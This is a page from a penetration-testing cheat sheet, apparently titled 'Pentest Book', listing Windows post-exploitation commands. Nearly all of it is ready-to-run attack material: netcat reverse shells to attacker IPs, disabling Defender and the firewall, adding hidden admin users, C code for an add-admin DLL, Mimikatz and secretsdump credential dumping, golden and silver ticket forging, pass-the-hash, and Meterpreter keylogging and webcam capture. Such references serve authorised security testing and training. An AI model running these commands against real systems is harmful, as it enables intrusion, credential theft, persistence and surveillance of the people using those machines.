Pentest Book
Search…
Windows

Local enum

1
# Tools
2
https://github.com/S3cur3Th1sSh1t/WinPwn
3
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/winPEAS/winPEASbat/winPEAS.bat
4
https://github.com/BC-SECURITY/Empire/blob/master/data/module_source/privesc/PowerUp.ps1
5
https://github.com/S3cur3Th1sSh1t/PowerSharpPack
6
https://github.com/Flangvik/SharpCollection
7
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
8
https://github.com/dafthack/DomainPasswordSpray
9
https://github.com/CredDefense/CredDefense
10
https://github.com/dafthack/MailSniper
11
https://github.com/itm4n/PrivescCheck
12
13
https://lolbas-project.github.io/#
14
15
# Basic info
16
systeminfo
17
set
18
Get-ChildItem Env: | ft Key,Value
19
hostname
20
net users
21
net user user1
22
query user
23
Get-LocalUser | ft Name,Enabled,LastLogon
24
Get-ChildItem C:\Users -Force | select Name
25
net use
26
wmic logicaldisk get caption,description,providername
27
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
28
net localgroups
29
accesschk.exe -uwcqv "Authenticated Users" *
30
netsh firewall show state
31
netsh firewall show config
32
whoami /priv
33
echo %USERNAME%
34
$env:UserName
35
wmic qfe
36
qwinsta
37
query user
38
net localgroup
39
Get-LocalGroup | ft Name
40
41
# Set path
42
set PATH=%PATH%;C:\xampp\php
43
44
dir /a -> Show hidden & unhidden files
45
dir /Q -> Show permissions
46
47
# check .net version:
48
gci 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP' -recurse | gp -name Version -EA 0 | where { $_.PSChildName -match '^(?!S)\p{L}'} | select PSChildName, Version
49
get-acl HKLM:\System\CurrentControlSet\services\* | Format-List * | findstr /i "Users Path"
50
51
# Passwords
52
# Windows autologin
53
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
54
# VNC
55
reg query "HKCU\Software\ORL\WinVNC3\Password"
56
# SNMP Parameters
57
reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP"
58
# Putty
59
reg query "HKCU\Software\SimonTatham\PuTTY\Sessions"
60
# Search for password in registry
61
reg query HKLM /f password /t REG_SZ /s
62
reg query HKCU /f password /t REG_SZ /s
63
python secretsdump.py -just-dc-ntlm htb.hostname/[email protected]
64
secretsdump.py -just-dc htb.hostname/[email protected] > dump.txt
65
66
# Add RDP user and disable firewall
67
net user test Test123! /add
68
net localgroup Administrators test /add
69
net localgroup "Remote Desktop Users" test /ADD
70
# Turn firewall off and enable RDP
71
sc stop WinDefend
72
netsh advfirewall show allprofiles
73
netsh advfirewall set allprofiles state off
74
netsh firewall set opmode disable
75
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
76
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
77
78
# Dump Firefox data
79
# Looking for Firefox
80
Get-Process
81
./procdump64.exe -ma $PID-FF
82
Select-String -Path .\*.dmp -Pattern 'password' > 1.txt
83
type 1.txt | findstr /s /i "admin"
84
85
# PS Bypass Policy
86
Set-ExecutionPolicy Unrestricted
87
powershell.exe -exec bypass
88
Set-ExecutionPolicy-ExecutionPolicyBypass -Scope Procesy
89
90
# Convert passwords to secure strings and output to an XML file:
91
$secpasswd = ConvertTo-SecureString "VMware1!" -AsPlainText -Force
92
$mycreds = New-Object System.Management.Automation.PSCredential ("administrator", $secpasswd)
93
$mycreds | export-clixml -path c:\temp\password.xml
94
95
# PS sudo
96
$pw= convertto-securestring "EnterPasswordHere" -asplaintext -force
97
$pp = new-object -typename System.Management.Automation.PSCredential -argumentlist "EnterDomainName\EnterUserName",$pw
98
$script = "C:\Users\EnterUserName\AppData\Local\Temp\test.bat"
99
Start-Process powershell -Credential $pp -ArgumentList '-noprofile -command &{Start-Process $script -verb Runas}'
100
powershell -ExecutionPolicy -F -File xyz.ps1
101
102
# PS runas
103
# START PROCESS
104
$username='someUser'
105
$password='somePassword'
106
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
107
$credential = New-Object System.Management.Automation.PSCredential $username, $securePassword
108
Start-Process .\nc.exe -ArgumentList '10.10.xx.xx 4445 -e cmd.exe' -Credential $credential
109
# INVOKE COMMAND
110
$pass = ConvertTo-SecureString 'l33th4x0rhector' -AsPlainText -Force; $Credential = New-Object System.Management.Automation.PSCredential ("fidelity\hector", $pass);Invoke-Command -Computer 'Fidelity' -ScriptBlock {C:\inetpub\wwwroot\uploads\nc.exe -e cmd 10.10.15.121 443} -credential $Credential
111
112
# Tasks
113
schtasks /query /fo LIST /v
114
file c:\WINDOWS\SchedLgU.Txt
115
python3 atexec.py Domain/Administrator:<Password>@[email protected] systeminfo
116
117
# Useradd bin
118
#include /* system, NULL, EXIT_FAILURE */
119
int main ()
120
{
121
int i;
122
i=system ("net user /add && net localgroup administrators /add");
123
return 0;
124
}
125
# Compile
126
i686-w64-mingw32-gcc -o useradd.exe useradd.c
127
128
# WinXP
129
sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.1.111 4343 -e C:\WINDOWS\System32\cmd.exe"
130
sc config upnphost obj= ".\LocalSystem" password= ""
131
sc qc upnphost
132
sc config upnphost depend= ""
133
net start upnphost
134
135
# WinRM Port Forwarding
136
plink -l LOCALUSER -pw LOCALPASSWORD LOCALIP -R 5985:127.0.0.1:5985 -P 221
137
138
# DLL Injection
139
#include
140
int owned()
141
{
142
WinExec("cmd.exe /c net user username Password01 ; net localgroup administrators username /add", 0);
143
exit(0);
144
return 0;
145
}
146
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
147
{
148
owned();
149
return 0;
150
}
151
# x64 compilation:
152
x86_64-w64-mingw32-g++ -c -DBUILDING_EXAMPLE_DLL main.cpp
153
x86_64-w64-mingw32-g++ -shared -o main.dll main.o -Wl,--out-implib,main.a
154
155
# Generate Silver Tickets with Impacket:
156
python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
157
python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>
158
159
# Generate Golden Tickets:
160
python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>
161
python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>
162
163
# Credential Access with Secretsdump
164
impacket-secretsdump [email protected] -dc-ip target-ip
165
166
# Disable Assembly code generator
167
https://amsi.fail/
Copied!

Mimikatz

1
# SAM
2
privilege::debug
3
token::elevate
4
lsadump::sam
5
6
# Windows Credential Manager
7
privilege::debug
8
sekurlsa::credman
9
10
# LSASS
11
privilege::debug
12
sekurlsa::minidump C:\Users\raj\Desktop\lsass.DMP
13
sekurlsa::logonpasswords
14
#or
15
privilege::debug
16
lsadump::lsa /patch
17
18
# WDigest
19
privilege::debug
20
sekurlsa::wdigest
Copied!

Privilege Escalation

1
# Check groups and privs
2
whoami /priv
3
4
# Interesting accounts
5
6
- Administrators, Local System
7
- Built-in groups (Backup, Server, Printer Operators)
8
- Local/network service accounts
9
- Managed Service and Virtual Accounts
10
- Third party application users
11
- Misconfigured users
12
13
# Interesting privileges
14
15
- SeDebugPrivilege
16
Create a new process and set the parent process a privileged process
17
https://github.com/decoder-it/psgetsystem
18
- SeRestorePrivilege
19
Can write files anywhere, overwrites files, protected system files
20
Modify a service running as Local and startable by all users and get a SYSTEM shell
21
- SeBackupPrivilege
22
Can backup Windows registry and use third party tools for extracting local NTLM hashes
23
Members of “Backup Operators” can logon locally on a Domain Controller and backup the NTDS.DIT
24
- SeTakeOwnershipPrivilege
25
Can take ownership of any securable object in the system
26
- SeTcbPrivilege
27
Can logon as a different user without any credentials in order to get a security Impersonation Token by using the LsaLogonUser() function
28
- SeCreateTokenPrivilege
29
Can create a custom token with all privileges and group membership you need (until Win 10 >= 1809)
30
But if you set the AuthenticationId to ANONYMOUS_LOGON_UID (0x3e6) you can always impersonate even in Win >=1809 and use a subset of API calls: CreateFile(), RegSetKey()
31
- SeLoadDriver Privilege
32
"Printer operators" have this privilege in the DC
33
Determines which users can dynamically load and unload device drivers or other code in to kernel mode
34
- SeImpersonatePrivilege & SeAssignPrimaryTokenPrivilege
35
Permit impersonate any access token
36
37
** If you have SeBackup & SeRestore privileges (Backup Operators group) you can set permission and ownership on each file & folder **
Copied!

Loot

1
hostname && whoami.exe && ipconfig /all
2
wce32.exe -w
3
wce64.exe -w
4
fgdump.exe
5
6
# Loot passwords without tools
7
reg.exe save hklm\sam c:\sam_backup
8
reg.exe save hklm\security c:\security_backup
9
reg.exe save hklm\system c:\system
10
11
ipconfig /all
12
route print
13
14
# What other machines have been connected
15
arp -a
16
17
# Meterpreter
18
run packetrecorder -li
19
run packetrecorder -i 1
20
21
#Meterpreter
22
search -f *.txt
23
search -f *.zip
24
search -f *.doc
25
search -f *.xls
26
search -f config*
27
search -f *.rar
28
search -f *.docx
29
search -f *.sql
30
hashdump
31
keysscan_start
32
keyscan_dump
33
keyscan_stop
34
webcam_snap
35
load mimikatz
36
msv
37
38
# How to cat files in meterpreter
39
cat c:\\Inetpub\\iissamples\\sdk\\asp\\components\\adrot.txt
40
41
# Recursive search
42
dir /s
43
44
secretsdump.py -just-dc htb.hostname/[email protected] > dump.txt
45
.\mimikatz.exe "lsadump::dcsync /user:Administrator" "exit"
46
47
# Mimikatz
48
# Post exploitation commands must be executed from SYSTEM level privileges.
49
mimikatz # privilege::debug
50
mimikatz # token::whoami
51
mimikatz # token::elevate
52
mimikatz # lsadump::sam
53
mimikatz # sekurlsa::logonpasswords
54
## Pass The Hash
55
mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
56
# Inject generated TGS key
57
mimikatz # kerberos::ptt <ticket_kirbi_file>
58
# Generating a silver ticket
59
# AES 256 Key:
60
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
61
# AES 128 Key:
62
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
63
# NTLM
64
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
65
# Generating a Golden Ticket
66
# AES 256 Key:
67
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
68
# AES 128 Key:
69
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
70
# NTLM:
71
mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
72
73
# Lsassy (remote lsass/mimikatz dump reader) (requires impacket)
74
git clone https://github.com/hackndo/lsassy
75
cd lsassy && sudo python3 setup.py install
76
lsassy example.com/Administrator:[email protected]
77
78
# Lsass dump
79
https://github.com/outflanknl/Dumpert
Copied!
Last modified 7mo ago
Export as PDF
Copy link
Edit on GitHub